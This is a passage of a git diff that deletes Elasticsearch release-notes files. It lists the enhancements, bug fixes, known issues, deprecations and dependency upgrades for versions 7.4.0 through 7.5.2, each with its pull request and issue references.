{es-pull}45292[#45292] -* Introduce formal node ML role {es-pull}45174[#45174] (issues: {es-issue}29943[#29943], {es-issue}43175[#43175]) -* Improve CSV header row detection in find_file_structure {es-pull}45099[#45099] (issue: {es-issue}45047[#45047]) -* Outlier detection should only fetch docs that have the analyzed fields {es-pull}44944[#44944] -* Persist DatafeedTimingStats with RefreshPolicy.NONE by default {es-pull}44940[#44940] (issue: {es-issue}44792[#44792]) -* Add result_type field to TimingStats and DatafeedTimingStats documents {es-pull}44812[#44812] -* Implement exponential average search time per hour statistics. {es-pull}44683[#44683] (issue: {es-issue}29857[#29857]) -* Add r_squared eval metric to regression {es-pull}44248[#44248] -* Adds support for regression.mean_squared_error to eval API {es-pull}44140[#44140] -* Add DatafeedTimingStats.average_search_time_per_bucket_ms and TimingStats.total_bucket_processing_time_ms stats {es-pull}44125[#44125] (issue: {es-issue}29857[#29857]) -* Add DatafeedTimingStats to datafeed GetDatafeedStatsAction.Response {es-pull}43045[#43045] (issue: {es-issue}29857[#29857]) - -Network:: -* Better logging for TLS message on non-secure transport channel {es-pull}45835[#45835] (issue: {es-issue}32688[#32688]) -* Asynchronously connect to remote clusters {es-pull}44825[#44825] (issue: {es-issue}40150[#40150]) -* Improve errors when TLS files cannot be read {es-pull}44787[#44787] (issue: {es-issue}43079[#43079]) -* Add per-socket keepalive options {es-pull}44055[#44055] -* Move ConnectionManager to async APIs {es-pull}42636[#42636] - -Ranking:: -* Search enhancement: pinned queries {es-pull}44345[#44345] (issue: {es-issue}44074[#44074]) -* Fix parameter value for calling data.advanceExact {es-pull}44205[#44205] -* Add l1norm and l2norm distances for vectors {es-pull}44116[#44116] (issue: {es-issue}37947[#37947]) - -Recovery:: -* Ignore translog retention policy if soft-deletes enabled {es-pull}45473[#45473] (issue: {es-issue}45136[#45136]) -* Only retain reasonable history for peer recoveries {es-pull}45208[#45208] (issue: {es-issue}41536[#41536]) -* Use index for peer recovery instead of translog {es-pull}45136[#45136] (issues: {es-issue}38904[#38904], {es-issue}41536[#41536], {es-issue}42211[#42211]) -* Trim local translog in peer recovery {es-pull}44756[#44756] -* Make peer recovery send file chunks async {es-pull}44468[#44468] (issues: {es-issue}36195[#36195], {es-issue}44040[#44040]) - -SQL:: -* SQL: Support queries with HAVING over SELECT {es-pull}46709[#46709] (issue: {es-issue}37051[#37051]) -* SQL: Break TextFormatter/Cursor dependency {es-pull}45613[#45613] (issue: {es-issue}45516[#45516]) -* SQL: remove deprecated use of "interval" from date_histogram usage {es-pull}45501[#45501] (issue: {es-issue}43922[#43922]) -* SQL: use hasValue() methods from Elasticsearch's InspectionHelper classes {es-pull}44745[#44745] (issue: {es-issue}35745[#35745]) -* Switch from using docvalue_fields to extracting values from _source {es-pull}44062[#44062] (issue: {es-issue}41852[#41852]) - -Search:: -* Adds usage stats for vectors: {es-pull}44512[#44512] -* Associate sub-requests to their parent task in multi search API {es-pull}44492[#44492] -* Cancel search task on connection close {es-pull}43332[#43332] - -Security:: -* Set security index refresh interval to 1s {es-pull}45434[#45434] (issue: {es-issue}44934[#44934]) - -Snapshot/Restore:: -* add disable_chunked_encoding configuration {es-pull}44052[#44052] -* Repository Cleanup Endpoint {es-pull}43900[#43900] - -Task Management:: -* Remove task null check in TransportAction {es-pull}45014[#45014] -* TaskListener#onFailure to accept Exception instead of Throwable {es-pull}44946[#44946] -* Move child task cancellation to TaskManager {es-pull}44573[#44573] (issue: {es-issue}44494[#44494]) - -Transforms:: -* Add update transform api endpoint {es-pull}45154[#45154] (issue: {es-issue}43438[#43438]) -* Add support for bucket_selector {es-pull}44718[#44718] (issues: {es-issue}43744[#43744], {es-issue}44557[#44557]) -* Add force delete {es-pull}44590[#44590] (issue: {es-issue}43961[#43961]) -* Add dynamic cluster setting for failure retries {es-pull}44577[#44577] -* Add optional defer_validation param to PUT {es-pull}44455[#44455] (issue: {es-issue}43439[#43439]) -* Add support for geo_bounds aggregation {es-pull}44441[#44441] -* Add a frequency option to transform config, default 1m {es-pull}44120[#44120] - - -[[bug-7.4.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix early termination of aggregators that run with breadth-first mode {es-pull}44963[#44963] (issue: {es-issue}44909[#44909]) -* Support BucketScript paths of type string and array. {es-pull}44694[#44694] (issue: {es-issue}44385[#44385]) - -Allocation:: -* Avoid overshooting watermarks during relocation {es-pull}46079[#46079] (issue: {es-issue}45177[#45177]) -* Cluster health should await events plus other things {es-pull}44348[#44348] -* Do not copy initial recovery filter during split {es-pull}44053[#44053] (issue: {es-issue}43955[#43955]) - -Analysis:: -* Enable reloading of synonym_graph filters {es-pull}45135[#45135] (issue: {es-issue}45127[#45127]) -* Fix AnalyzeAction response serialization {es-pull}44284[#44284] (issue: {es-issue}44078[#44078]) - -Authentication:: -* Fallback to realm authc if ApiKey fails {es-pull}46538[#46538] -* Enforce realm name uniqueness {es-pull}46253[#46253] -* Allow empty token endpoint for implicit flow {es-pull}45038[#45038] -* Do not use scroll when finding duplicate API key {es-pull}45026[#45026] -* Fix broken short-circuit in getUnlicensedRealms {es-pull}44399[#44399] -* Fix X509AuthenticationToken principal {es-pull}43932[#43932] (issues: {es-issue}34396[#34396], {es-issue}43796[#43796]) - -Authorization:: -* Do not rewrite aliases on remove-index from aliases requests {es-pull}46989[#46989] -* Give kibana user privileges to create APM agent config index {es-pull}46765[#46765] (issue: {es-issue}45610[#45610]) -* Add `manage_own_api_key` cluster privilege {es-pull}45696[#45696] (issue: {es-issue}40031[#40031]) -* Sparse role queries can throw an NPE {es-pull}45053[#45053] - -CCR:: -* Clean up ShardFollowTasks for deleted indices {es-pull}44702[#44702] (issue: {es-issue}34404[#34404]) -* Skip update if leader and follower settings identical {es-pull}44535[#44535] (issue: {es-issue}44521[#44521]) -* Avoid stack overflow in auto-follow coordinator {es-pull}44421[#44421] (issue: {es-issue}43251[#43251]) -* Avoid NPE when checking for CCR index privileges {es-pull}44397[#44397] (issue: {es-issue}44172[#44172]) - -CRUD:: -* Ignore replication for noop updates {es-pull}46458[#46458] (issues: {es-issue}41065[#41065], {es-issue}44603[#44603], {es-issue}46366[#46366]) -* Allow _update on write alias {es-pull}45318[#45318] (issue: {es-issue}31520[#31520]) -* Do not allow version in Rest Update API {es-pull}43516[#43516] (issue: {es-issue}42497[#42497]) - -Cluster Coordination:: -* Assert no exceptions during state application {es-pull}47090[#47090] (issue: {es-issue}47038[#47038]) -* Avoid counting votes from master-ineligible nodes {es-pull}43688[#43688] - -Distributed:: -* Fix false positive out of sync warning in synced-flush {es-pull}46576[#46576] (issues: {es-issue}28464[#28464], {es-issue}30244[#30244]) -* Suppress warning logs from background sync on relocated primary {es-pull}46247[#46247] (issues: {es-issue}40800[#40800], {es-issue}42241[#42241]) -* Ensure AsyncTask#isScheduled remain false after close {es-pull}45687[#45687] (issue: {es-issue}45576[#45576]) -* Update translog checkpoint after marking operations as persisted {es-pull}45634[#45634] (issue: {es-issue}29161[#29161]) -* Fix clock used in update requests {es-pull}45262[#45262] (issue: {es-issue}45254[#45254]) -* Restore DefaultShardOperationFailedException's reason during deserialization {es-pull}45203[#45203] -* Use IndicesModule named writables in elasticsearch-shard tool {es-pull}45036[#45036] (issue: {es-issue}44628[#44628]) - -Engine:: -* Handle delete document level failures {es-pull}46100[#46100] (issue: {es-issue}46083[#46083]) -* Handle no-op document level failures {es-pull}46083[#46083] -* Remove leniency during replay translog in peer recovery {es-pull}44989[#44989] -* Throw TranslogCorruptedException in more cases {es-pull}44217[#44217] -* Fail engine if hit document failure on replicas {es-pull}43523[#43523] (issues: {es-issue}40435[#40435], {es-issue}43228[#43228]) - -Features/ILM:: -* Handle partial failure retrieving segments in SegmentCountStep {es-pull}46556[#46556] -* Fixes for API specification {es-pull}46522[#46522] -* Fix SnapshotLifecycleMetadata xcontent serialization {es-pull}46500[#46500] (issue: {es-issue}46499[#46499]) -* Updated slm API spec parameters and URL {es-pull}44797[#44797] -* Fix swapped variables in error message {es-pull}44300[#44300] - -Features/Indices APIs:: -* Fix a bug where mappings are dropped from rollover requests. {es-pull}45411[#45411] (issue: {es-issue}45399[#45399]) -* Create index with typeless mapping {es-pull}45120[#45120] -* Check shard limit after applying index templates {es-pull}44619[#44619] (issues: {es-issue}34021[#34021], {es-issue}44567[#44567], {es-issue}44619[#44619]) -* Validate index settings after applying templates {es-pull}44612[#44612] (issues: {es-issue}34021[#34021], {es-issue}44567[#44567]) - -Features/Ingest:: -* Allow dropping documents with auto-generated ID {es-pull}46773[#46773] (issue: {es-issue}46678[#46678]) - -Features/Java High Level REST Client:: -* [HLRC] Send min_score as query string parameter to the count API {es-pull}46829[#46829] (issue: {es-issue}46474[#46474]) -* HLRC multisearchTemplate forgot params {es-pull}46492[#46492] (issue: {es-issue}46488[#46488]) -* terminateAfter added to the RequestConverter {es-pull}46474[#46474] (issue: {es-issue}46446[#46446]) -* [Closes #44045] Added 'slices' parameter when submitting reindex request via Java high level REST client {es-pull}45690[#45690] (issue: {es-issue}44045[#44045]) -* HLRC: Fix '+' Not Correctly Encoded in GET Req. {es-pull}33164[#33164] (issue: {es-issue}33077[#33077]) - -Features/Watcher:: -* Fix class used to initialize logger in Watcher {es-pull}46467[#46467] -* Fix wrong URL encoding in watcher HTTP client {es-pull}45894[#45894] (issue: {es-issue}44970[#44970]) -* Fix watcher HttpClient URL creation {es-pull}45207[#45207] (issue: {es-issue}44970[#44970]) -* Log write failures for watcher history document. {es-pull}44129[#44129] - -Geo:: -* Geo: fix geo query decomposition {es-pull}44924[#44924] (issue: {es-issue}44891[#44891]) -* Geo: add validator that only checks altitude {es-pull}43893[#43893] - -Highlighting:: -* Fix highlighting for script_score query {es-pull}46507[#46507] (issue: {es-issue}46471[#46471]) - -Infra/Core:: -* Always check that cgroup data is present {es-pull}45606[#45606] (issue: {es-issue}45396[#45396]) -* Safe publication of DelayedAllocationService and SnapshotShardsService {es-pull}45517[#45517] (issue: {es-issue}38560[#38560]) -* Add default CLI JVM options {es-pull}44545[#44545] (issues: {es-issue}219[#219], {es-issue}42021[#42021]) -* Fix decimal point parsing for date_optional_time {es-pull}43859[#43859] (issue: {es-issue}43730[#43730]) - -Infra/Logging:: -* Fix types field in JSON Search Slow Logs {es-pull}44641[#44641] -* Add types field to JSON slow logs in 7.x {es-pull}44592[#44592] (issues: {es-issue}41354[#41354], {es-issue}44178[#44178]) - -Infra/Packaging:: -* Add destructiveDistroTest meta task {es-pull}45762[#45762] -* Use bundled JDK in Sys V init {es-pull}45593[#45593] (issue: {es-issue}45542[#45542]) -* Restore setting up temp dir for windows service {es-pull}44541[#44541] - -Infra/Plugins:: -* Do not checksum all bytes at once in plugin install {es-pull}44649[#44649] (issue: {es-issue}44545[#44545]) - -Infra/REST API:: -* Improve error message when index settings are not a map {es-pull}45588[#45588] (issue: {es-issue}45126[#45126]) -* Add is_write_index column to cat.aliases {es-pull}44772[#44772] -* Fix URL documentation in API specs {es-pull}44487[#44487] - -Infra/Scripting:: -* Fix bugs in Painless SCatch node {es-pull}45880[#45880] -* Fix JodaCompatibleZonedDateTime casts in Painless {es-pull}44874[#44874] - -Infra/Settings:: -* bug fix about elasticsearch.common.settings.Settings.processSetting {es-pull}44047[#44047] (issue: {es-issue}43791[#43791]) - -Machine Learning:: -* Fix two datafeed flush lockup bugs {es-pull}46982[#46982] -* Throw an error when a datafeed needs CCS but it is not enabled for the node {es-pull}46044[#46044] (issue: {es-issue}46025[#46025]) -* Handle "null" value of Estimate memory usage API response gracefully. {es-pull}45726[#45726] (issue: {es-issue}44699[#44699]) -* Remove timeout on waiting for data frame analytics result processor to complete {es-pull}45724[#45724] (issue: {es-issue}45723[#45723]) -* Check dest index is empty when starting data frame analytics {es-pull}45094[#45094] -* Catch any error thrown while closing data frame analytics process {es-pull}44958[#44958] -* Treat PostDataActionResponse.DataCounts.bucketCount as incremental rather than absolute (total). {es-pull}44803[#44803] (issue: {es-issue}44792[#44792]) -* Treat big changes in searchCount as significant and persist the document after such changes {es-pull}44413[#44413] (issues: {es-issue}44196[#44196], {es-issue}44335[#44335]) -* Update .ml-config mappings before indexing job, datafeed or data frame analytics config {es-pull}44216[#44216] (issue: {es-issue}44263[#44263]) -* Wait for .ml-config primary before assigning persistent tasks {es-pull}44170[#44170] (issue: {es-issue}44156[#44156]) -* Fix ML memory tracker lockup when inner step fails {es-pull}44158[#44158] (issue: {es-issue}44156[#44156]) -* Fix datafeed checks when a concrete remote index is present {es-pull}43923[#43923] (issue: {es-issue}42113[#42113]) -* Rename outlier detection method values `knn` and `tnn` to `distance_kth_nn` and `distance_knn` -respectively to match the API. {ml-pull}598[#598] -* Fix occasional (non-deterministic) reinitialisation of modeling for the `lat_long` -function. {ml-pull}641[#641] - -Mapping:: -* Make sure to validate the type before attempting to merge a new mapping. {es-pull}45157[#45157] (issues: {es-issue}29316[#29316], {es-issue}43012[#43012]) -* Ensure field caps doesn't error on rank feature fields. {es-pull}44370[#44370] (issue: {es-issue}44330[#44330]) -* Prevent types deprecation warning for indices.exists requests {es-pull}43963[#43963] (issue: {es-issue}43905[#43905]) -* Add include_type_name in indices.exitst REST API spec {es-pull}43910[#43910] (issue: {es-issue}43905[#43905]) - -Network:: -* Fix Broken HTTP Request Breaking Channel Closing {es-pull}45958[#45958] (issues: {es-issue}43362[#43362], {es-issue}43850[#43850]) -* Fix plaintext on TLS port logging {es-pull}45852[#45852] (issue: {es-issue}32688[#32688]) -* transport.publish_address should contain CNAME {es-pull}45626[#45626] (issues: {es-issue}32806[#32806], {es-issue}39970[#39970]) -* Fix bug in copying bytes for socket write {es-pull}45463[#45463] (issue: {es-issue}45444[#45444]) - -Recovery:: -* Never release store using CancellableThreads {es-pull}45409[#45409] (issues: {es-issue}45136[#45136], {es-issue}45237[#45237]) -* Remove leniency in reset engine from translog {es-pull}44711[#44711] - -Rollup:: -* Fix Rollup job creation to work with templates {es-pull}43943[#43943] - -SQL:: -* SQL: Properly handle indices with no/empty mapping {es-pull}46775[#46775] (issue: {es-issue}46757[#46757]) -* SQL: improve ResultSet behavior when no rows are available {es-pull}46753[#46753] (issue: {es-issue}46750[#46750]) -* SQL: use the correct data type for types conversion {es-pull}46574[#46574] (issue: {es-issue}46090[#46090]) -* SQL: Fix issue with common type resolution {es-pull}46565[#46565] (issue: {es-issue}46551[#46551]) -* SQL: fix scripting for grouped by datetime functions {es-pull}46421[#46421] (issue: {es-issue}40241[#40241]) -* SQL: Use null schema response {es-pull}46386[#46386] (issue: {es-issue}46381[#46381]) -* SQL: Fix issue with IIF function when condition folds {es-pull}46290[#46290] (issue: {es-issue}46268[#46268]) -* SQL: Fix issue with DataType for CASE with NULL {es-pull}46173[#46173] (issue: {es-issue}46032[#46032]) -* SQL: adds format parameter to range queries for constant date comparisons {es-pull}45326[#45326] (issue: {es-issue}45139[#45139]) -* SQL: uniquely named inner_hits sections for each nested field condition {es-pull}45039[#45039] (issues: {es-issue}33080[#33080], {es-issue}44544[#44544]) -* SQL: fix URI path being lost in case of hosted ES scenario {es-pull}44776[#44776] (issue: {es-issue}44721[#44721]) -* SQL: change the size of the list of concrete indices when resolving multiple indices {es-pull}43878[#43878] (issue: {es-issue}43876[#43876]) -* SQL: handle double quotes escaping {es-pull}43829[#43829] (issue: {es-issue}43810[#43810]) -* SQL: add pretty printing to JSON format {es-pull}43756[#43756] -* SQL: handle SQL not being available in a more graceful way {es-pull}43665[#43665] (issue: {es-issue}41279[#41279]) - -Search:: -* Multi-get requests should wait for search active {es-pull}46283[#46283] (issue: {es-issue}27500[#27500]) -* Ensure top docs optimization is fully disabled for queries with unbounded max scores. {es-pull}46105[#46105] (issue: {es-issue}45933[#45933]) -* Disallow partial results when shard unavailable {es-pull}45739[#45739] (issue: {es-issue}42612[#42612]) -* Prevent Leaking Search Tasks on Exceptions in FetchSearchPhase and DfsQueryPhase {es-pull}45500[#45500] -* Fix an NPE when requesting inner hits and _source is disabled. {es-pull}44836[#44836] (issue: {es-issue}43517[#43517]) -* Don't use index_phrases on graph queries {es-pull}44340[#44340] (issue: {es-issue}43976[#43976]) - -Security:: -* Initialize document subset bit set cache used for DLS {es-pull}46211[#46211] (issue: {es-issue}45147[#45147]) -* Fix .security-* indices auto-create {es-pull}44918[#44918] -* SecurityIndexManager handle RuntimeException while reading mapping {es-pull}44409[#44409] -* Do not swallow I/O exception getting authentication {es-pull}44398[#44398] (issues: {es-issue}44172[#44172], {es-issue}44397[#44397]) -* Use system context for looking up connected nodes {es-pull}43991[#43991] (issue: {es-issue}43974[#43974]) - -Snapshot/Restore:: -* Fix Bug in Snapshot Status Response Timestamps {es-pull}46919[#46919] (issue: {es-issue}46913[#46913]) -* GCS deleteBlobsIgnoringIfNotExists should catch StorageException {es-pull}46832[#46832] (issue: {es-issue}46772[#46772]) -* Fix TransportSnapshotsStatusAction ThreadPool Use {es-pull}45824[#45824] -* Stop Executing SLM Policy Transport Action on Snapshot Pool {es-pull}45727[#45727] (issue: {es-issue}45594[#45594]) -* Check again on-going snapshots/restores of indices before closing {es-pull}43873[#43873] -* Make Timestamps Returned by Snapshot APIs Consistent {es-pull}43148[#43148] (issue: {es-issue}43074[#43074]) -* Recursively Delete Unreferenced Index Directories {es-pull}42189[#42189] (issue: {es-issue}13159[#13159]) - -Task Management:: -* Catch AllocatedTask registration failures {es-pull}45300[#45300] - -Transforms:: -* Use field_caps API for mapping deduction {es-pull}46703[#46703] (issue: {es-issue}46694[#46694]) -* Fix off-by-one error in checkpoint operations_behind {es-pull}46235[#46235] -* Moves failure state transition for MT safety {es-pull}45676[#45676] (issue: {es-issue}45664[#45664]) -* Fix _start?force=true bug {es-pull}45660[#45660] -* Fix failure state transitions and race condition {es-pull}45627[#45627] (issues: {es-issue}45562[#45562], {es-issue}45609[#45609]) -* Fix starting a batch data frame after stopping at runtime {es-pull}45340[#45340] (issues: {es-issue}44219[#44219], {es-issue}45339[#45339]) -* Fix null aggregation handling in indexer {es-pull}45061[#45061] (issue: {es-issue}44906[#44906]) -* Unify validation exceptions between PUT and _preview {es-pull}44983[#44983] (issue: {es-issue}44953[#44953]) -* Treat bulk index failures as an indexing failure {es-pull}44351[#44351] (issue: {es-issue}44101[#44101]) -* Prevent task from attempting to run when failed {es-pull}44239[#44239] (issue: {es-issue}44121[#44121]) -* Respond with 409 status code when failing _stop {es-pull}44231[#44231] (issue: {es-issue}44103[#44103]) -* Add index validations to _start data frame transform {es-pull}44191[#44191] (issue: {es-issue}44104[#44104]) -* Data frame task failure does not make a 500 response {es-pull}44058[#44058] (issue: {es-issue}44011[#44011]) -* Audit message missing for autostop {es-pull}43984[#43984] (issue: {es-issue}43977[#43977]) - -[[regression-7.4.0]] -[discrete] -=== Regressions - -Aggregations:: -* Implement rounding optimization for fixed offset timezones {es-pull}46670[#46670] (issue: {es-issue}45702[#45702]) - - - -[[upgrade-7.4.0]] -[discrete] -=== Upgrades - -Infra/Core:: -* Update joda to 2.10.3 {es-pull}45495[#45495] - -Infra/Packaging:: -* Upgrade to JDK 12.0.2 {es-pull}45172[#45172] - -Network:: -* Upgrade to Netty 4.1.38 {es-pull}45132[#45132] - -Search:: -* Upgrade to lucene snapshot 8.3.0-snapshot-8dd116a6158 {es-pull}45604[#45604] (issue: {es-issue}43976[#43976]) diff --git a/docs/reference/release-notes/7.5.asciidoc b/docs/reference/release-notes/7.5.asciidoc deleted file mode 100644 index 141bcc55b44..00000000000 --- a/docs/reference/release-notes/7.5.asciidoc +++ /dev/null @@ -1,581 +0,0 @@ -[[release-notes-7.5.2]] -== {es} version 7.5.2 - -[[enhancement-7.5.2]] -[discrete] -=== Enhancements - -Features/Ingest:: -* Fork recursive calls in Foreach processor {es-pull}50514[#50514] - -Infra/Core:: -* Fix unintended debug logging in subclasses of TransportMasterNodeAction {es-pull}50839[#50839] (issues: {es-issue}50056[#50056], {es-issue}50074[#50074], {es-issue}50076[#50076]) - - -[[bug-7.5.2]] -[discrete] -=== Bug fixes - -Analysis:: -* Fix caching for PreConfiguredTokenFilter {es-pull}50912[#50912] (issue: {es-issue}50734[#50734]) - -CRUD:: -* Block too many concurrent mapping updates {es-pull}51038[#51038] (issue: {es-issue}50670[#50670]) - -Engine:: -* Account soft-deletes in FrozenEngine {es-pull}51192[#51192] (issue: {es-issue}50775[#50775]) - -Features/ILM+SLM:: -* Fix SLM check for restore in progress {es-pull}50868[#50868] - -Features/Ingest:: -* Fix ingest simulate response document order if processor executes async {es-pull}50244[#50244] - -Features/Java Low Level REST Client:: -* Improve warning value extraction performance in response {es-pull}50208[#50208] (issue: {es-issue}24114[#24114]) - -Machine Learning:: -* Fixes potential memory corruption or inconsistent state when background -persisting categorizer state. {ml-pull}921[#921] - -Mapping:: -* Ensure that field collapsing works with field aliases. {es-pull}50722[#50722] (issues: {es-issue}32648[#32648], {es-issue}50121[#50121]) -* Fix meta version of task index mapping {es-pull}50363[#50363] (issue: {es-issue}48393[#48393]) - -Recovery:: -* Check allocation ID when failing shard on recovery {es-pull}50656[#50656] (issue: {es-issue}50508[#50508]) - -SQL:: -* Change the way unsupported data types fields are handled {es-pull}50823[#50823] -* Optimization fixes for conjunction merges {es-pull}50703[#50703] (issue: {es-issue}49637[#49637]) -* Fix issue with CAST and NULL checking. {es-pull}50371[#50371] (issue: {es-issue}50191[#50191]) -* Fix NPE for JdbcResultSet.getDate(param, Calendar) calls {es-pull}50184[#50184] (issue: {es-issue}50174[#50174]) - -Search:: -* Fix upgrade of custom similarity {es-pull}50851[#50851] (issue: {es-issue}50763[#50763]) - -Security:: -* Always consume the request body of `has_privileges` API {es-pull}50298[#50298] (issue: {es-issue}50288[#50288]) - - -[[release-notes-7.5.1]] -== {es} version 7.5.1 - -Also see <>. - -[[enhancement-7.5.1]] -[discrete] -=== Enhancements - -Features/Watcher:: -* Log attachment generation failures {es-pull}50080[#50080] - -Network:: -* Netty4: switch to composite cumulator {es-pull}49478[#49478] - - - -[[bug-7.5.1]] -[discrete] -=== Bug fixes - -Authentication:: -* Fix iterate-from-1 bug in smart realm order {es-pull}49473[#49473] - -CRUD:: -* Do not mutate request on scripted upsert {es-pull}49578[#49578] (issue: {es-issue}48670[#48670]) - -Cluster Coordination:: -* Make elasticsearch-node tools custom metadata-aware {es-pull}48390[#48390] - -Engine:: -* Account trimAboveSeqNo in committed translog generation {es-pull}50205[#50205] (issue: {es-issue}49970[#49970]) - -Features/ILM+SLM:: -* Handle failure to retrieve ILM policy step better {es-pull}49193[#49193] (issue: {es-pull}49128[#49128]) - -Features/Java High Level REST Client:: -* Support es7 node http publish_address format {es-pull}49279[#49279] (issue: {es-issue}48950[#48950]) - -Geo:: -* Fix handling of circles in legacy geo_shape queries {es-pull}49410[#49410] (issue: {es-issue}49296[#49296]) - -Infra/Packaging:: -* Extend systemd timeout during startup {es-pull}49784[#49784] (issue: {es-issue}49593[#49593]) - -Machine Learning:: -* Use query in cardinality check {es-pull}49939[#49939] -* Fix expired job results deletion audit message {es-pull}49560[#49560] (issue: {es-issue}49549[#49549]) -* Apply source query on data frame analytics memory estimation {es-pull}49527[#49527] (issue: {es-issue}49454[#49454]) -* Stop timing stats failure propagation {es-pull}49495[#49495] - -Mapping:: -* Improve DateFieldMapper `ignore_malformed` handling {es-pull}50090[#50090] (issue: {es-issue}50081[#50081]) - -Recovery:: -* Migrate peer recovery from translog to retention lease {es-pull}49448[#49448] (issue: {es-issue}45136[#45136]) - -SQL:: -* COUNT DISTINCT returns 0 instead of NULL for no matching docs {es-pull}50037[#50037] (issue: {es-issue}50013[#50013]) -* Fix LOCATE function optional parameter handling {es-pull}49666[#49666] (issue: {es-issue}49557[#49557]) -* Fix NULL handling for FLOOR and CEIL functions {es-pull}49644[#49644] (issue: {es-issue}49556[#49556]) -* Handle NULL arithmetic operations with INTERVALs {es-pull}49633[#49633] (issue: {es-issue}49297[#49297]) -* Fix issue with GROUP BY YEAR() {es-pull}49559[#49559] (issue: {es-issue}49386[#49386]) -* Fix issue with CASE/IIF pre-calculating results {es-pull}49553[#49553] (issue: {es-issue}49388[#49388]) -* Fix issue with folding of CASE/IIF {es-pull}49449[#49449] (issue: {es-issue}49387[#49387]) -* Fix issues with WEEK/ISO_WEEK/DATEDIFF {es-pull}49405[#49405] (issues: {es-issue}48209[#48209], {es-issue}49376[#49376]) - -Snapshot/Restore:: -* Fix Index Deletion during Snapshot Finalization {es-pull}50202[#50202] (issues: {es-issue}45689[#45689], {es-issue}50200[#50200]) - -Transform:: -* Fix possible audit logging disappearance after rolling upgrade {es-pull}49731[#49731] (issue: {es-issue}49730[#49730]) - - -[[release-notes-7.5.0]] -== {es} version 7.5.0 - -Also see <>. - -[[known-issues-7.5.0]] -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to stop shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likeliness of this -corruption in the case that deletes/updates would be applied by mistake. This -bug is fixed in {es} 7.7 and later versions. More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -* Stop all {transforms} during a rolling upgrade to 7.5. -If a {transform} is running during upgrade, the {transform} audit index might disappear. -(issue: {es-issue}/49730[#49730]) - -* Indices created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns will cause parsing errors, incorrect date calculations or wrong search results. -https://github.com/elastic/elasticsearch/pull/52555 -This is fixed in {es} 7.7 and later versions. - -[[breaking-7.5.0]] -[discrete] -=== Breaking changes - -Search:: -* Add support for aliases in queries on _index. {es-pull}46640[#46640] (issues: {es-issue}23306[#23306], {es-issue}34089[#34089]) - - - -[[deprecation-7.5.0]] -[discrete] -=== Deprecations - -Aggregations:: -* Deprecate the "index.max_adjacency_matrix_filters" setting {es-pull}46394[#46394] (issue: {es-issue}46324[#46324]) - -Allocation:: -* Deprecate include_relocations setting {es-pull}47443[#47443] (issue: {es-issue}46079[#46079]) - -Mapping:: -* Deprecate `_field_names` disabling {es-pull}42854[#42854] (issue: {es-issue}27239[#27239]) - -Search:: -* Reject regexp queries on the _index field. {es-pull}46945[#46945] (issues: {es-issue}34089[#34089], {es-issue}46640[#46640]) - - - -[[feature-7.5.0]] -[discrete] -=== New features - -Features/ILM+SLM:: -* Add API to execute SLM retention on-demand {es-pull}47405[#47405] (issues: {es-issue}43663[#43663], {es-issue}46508[#46508]) -* Add retention to Snapshot Lifecycle Management {es-pull}46407[#46407] (issues: {es-issue}38461[#38461], {es-issue}43663[#43663], {es-issue}45362[#45362]) - -Features/Ingest:: -* Add enrich processor {es-pull}48039[#48039] (issue: {es-issue}32789[#32789]) - -Machine Learning:: -* Implement evaluation API for multiclass classification problem {es-pull}47126[#47126] (issue: {es-issue}46735[#46735]) -* Implement new analysis type: classification {es-pull}46537[#46537] (issue: {es-issue}46735[#46735]) -* Add audit messages for Data Frame Analytics {es-pull}46521[#46521] (issue: {es-issue}184[#184]) -* Implement DataFrameAnalyticsAuditMessage and DataFrameAnalyticsAuditor {es-pull}45967[#45967] - -SQL:: -* SQL: Implement DATEDIFF function {es-pull}47920[#47920] (issue: {es-issue}47919[#47919]) -* SQL: Implement DATEADD function {es-pull}47747[#47747] (issue: {es-issue}47746[#47746]) -* SQL: Implement DATE_PART function {es-pull}47206[#47206] (issue: {es-issue}46372[#46372]) -* SQL: Add alias DATETRUNC to DATE_TRUNC function {es-pull}47173[#47173] (issue: {es-issue}46473[#46473]) -* SQL: Add PIVOT support {es-pull}46489[#46489] -* SQL: Implement DATE_TRUNC function {es-pull}46473[#46473] (issue: {es-issue}46319[#46319]) - - - -[[enhancement-7.5.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Adjacency_matrix aggregation memory usage optimisation. {es-pull}46257[#46257] (issue: {es-issue}46212[#46212]) -* Support geotile_grid aggregation in composite agg sources {es-pull}45810[#45810] (issue: {es-issue}40568[#40568]) - -Allocation:: -* Do not cancel ongoing recovery for noop copy on broken node {es-pull}48265[#48265] (issue: {es-issue}47974[#47974]) -* Shrink should not touch max_retries {es-pull}47719[#47719] -* Re-fetch shard info of primary when new node joins {es-pull}47035[#47035] (issues: {es-issue}42518[#42518], {es-issue}46959[#46959]) -* Sequence number based replica allocation {es-pull}46959[#46959] (issue: {es-issue}46318[#46318]) - -Authorization:: -* Add support to retrieve all API keys if user has privilege {es-pull}47274[#47274] (issue: {es-issue}46887[#46887]) -* Add 'create_doc' index privilege {es-pull}45806[#45806] -* Reducing privileges needed by built-in beats_admin role {es-pull}41586[#41586] - -CCR:: -* Add Pause/Resume Auto-Follower APIs to High Level REST Client {es-pull}47989[#47989] (issue: {es-issue}47510[#47510]) -* Add Pause/Resume Auto Follower APIs {es-pull}47510[#47510] (issue: {es-issue}46665[#46665]) - -CRUD:: -* Allow optype CREATE for append-only indexing operations {es-pull}47169[#47169] - -Cluster Coordination:: -* Warn on slow metadata persistence {es-pull}47005[#47005] -* Improve LeaderCheck rejection messages {es-pull}46998[#46998] - -Engine:: -* Do not warm up searcher in engine constructor {es-pull}48605[#48605] (issue: {es-issue}47186[#47186]) -* Refresh should not acquire readLock {es-pull}48414[#48414] (issue: {es-issue}47186[#47186]) -* Avoid unneeded refresh with concurrent realtime gets {es-pull}47895[#47895] -* sync before trimUnreferencedReaders to improve index preformance {es-pull}47790[#47790] (issues: {es-issue}46201[#46201], {es-issue}46203[#46203]) -* Limit number of retaining translog files for peer recovery {es-pull}47414[#47414] -* Remove isRecovering method from Engine {es-pull}47039[#47039] - -Features/ILM+SLM:: -* Separate SLM stop/start/status API from ILM {es-pull}47710[#47710] (issue: {es-issue}43663[#43663]) -* Set default SLM retention invocation time {es-pull}47604[#47604] (issue: {es-issue}43663[#43663]) -* ILM: Skip rolling indexes that are already rolled 